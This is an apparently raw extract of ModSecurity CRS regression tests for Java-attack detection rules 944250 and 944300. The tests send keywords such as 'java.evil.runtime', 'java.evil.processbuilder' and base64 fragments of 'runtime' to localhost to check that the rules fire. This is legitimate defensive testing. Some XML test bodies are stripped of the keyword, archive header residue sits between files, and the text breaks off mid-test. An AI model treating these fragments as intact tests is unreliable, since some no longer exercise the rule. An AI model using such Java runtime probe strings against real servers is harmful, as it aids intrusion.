                'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=java.evil.runtime'
          output:
            log_contains: 'id "944250"'
  # Keyword java.evil.runtime in the remaining request locations
  # (argument name, cookie value/name, header, XML). Every case is a
  # positive test: it expects rule id 944250 in the log.
  - test_title: '944250-1'
    desc: 'Argument name includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'java.evil.runtime=test'
          output:
            log_contains: 'id "944250"'
  - test_title: '944250-2'
    desc: 'Cookie test includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'test=java.evil.runtime'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944250"'
  - test_title: '944250-3'
    desc: 'Cookie name includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              Cookie: 'java.evil.runtime=test'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944250"'
  - test_title: '944250-4'
    desc: 'Request header test includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/x-www-form-urlencoded'
              test: 'java.evil.runtime'
            method: 'POST'
            version: 'HTTP/1.0'
            data: 'test=value'
          output:
            log_contains: 'id "944250"'
  - test_title: '944250-5'
    desc: 'XML attribute value includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): no XML markup or keyword visible in this body; presumably stripped - confirm upstream.
            data: 'element_value'
          output:
            log_contains: 'id "944250"'
  - test_title: '944250-6'
    desc: 'XML element value includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
            dest_addr: '127.0.0.1'
            port: 80
            headers:
              Host: 'localhost'
              User-Agent: 'ModSecurity CRS 3 Tests'
              Accept: 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5'
              Accept-Charset: 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'
              Accept-Encoding: 'gzip,deflate'
              Accept-Language: 'en-us,en;q=0.5'
              Content-Type: 'application/xml'
            method: 'POST'
            version: 'HTTP/1.0'
            # NOTE(review): bare keyword, no XML markup visible; presumably stripped - confirm upstream.
            data: 'java.evil.runtime'
          output:
            log_contains: 'id "944250"'
  # Test 944250-7 opens here; its request fields follow on the next line of the page.
  - test_title: '944250-7'
    desc: 'Nested XML element value includes keyword java.evil.runtime'
    stages:
      - stage:
          input:
dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-8 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-9 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.evil.runtime\"}" output: log_contains: "id \"944250\"" - test_title: 944250-10 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.evil.runtime\": \"test\"}" output: log_contains: "id \"944250\"" - test_title: 944250-11 desc: "Argument test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-12 desc: "Argument name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder=test" output: log_contains: "id \"944250\"" - test_title: 944250-13 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.evil.processbuilder method: "POST" version: "HTTP/1.0" data: 
"test=value" output: log_contains: "id \"944250\"" - test_title: 944250-14 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.evil.processbuilder=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-15 desc: "Request header test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.evil.processbuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-16 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944250\"" - test_title: 944250-17 desc: "XML element value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: 
Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-18 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-19 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-20 desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.evil.processbuilder\"}" output: log_contains: "id \"944250\"" - test_title: 944250-21 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.evil.processbuilder\": \"test\"}" output: log_contains: "id \"944250\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml��������0000664�0000000�0000000�00001040352�14461225151�0027672�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944300.yaml" description: "Positive tests for rule 944300" tests: - test_title: 944300-0 desc: "Argument test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: 
"ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-1 desc: "Argument name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-2 desc: "Cookie test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cnVudGltZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-3 desc: "Cookie name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/x-www-form-urlencoded" Cookie: cnVudGltZQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-4 desc: "Request header test includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cnVudGltZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-5 desc: "XML attribute value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-6 desc: "XML element value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-7 desc: "Nested XML element value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
"localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-8 desc: "Content-Type text/plain includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cnVudGltZQ" output: log_contains: "id \"944300\"" - test_title: 944300-9 desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cnVudGltZQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-10 desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/json" method: "POST" version: "HTTP/1.0" data: "{\"cnVudGltZQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-11 desc: "Argument test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-12 desc: "Argument name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU=test" output: log_contains: "id \"944300\"" - test_title: 944300-13 desc: "Cookie test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HJ1bnRpbWU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-14 desc: "Cookie name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" 
User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HJ1bnRpbWU=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-15 desc: "Request header test includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HJ1bnRpbWU method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-16 desc: "XML attribute value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-17 desc: "XML element value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-18 desc: "Nested XML element value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-19 desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HJ1bnRpbWU" output: log_contains: "id \"944300\"" - test_title: 944300-20 desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HJ1bnRpbWU\"}" output: log_contains: "id \"944300\"" - test_title: 944300-21 desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: 
"localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HJ1bnRpbWU\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-22 desc: "Argument test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-23 desc: "Argument name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l=test" output: log_contains: "id \"944300\"" - test_title: 944300-24 desc: "Cookie test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
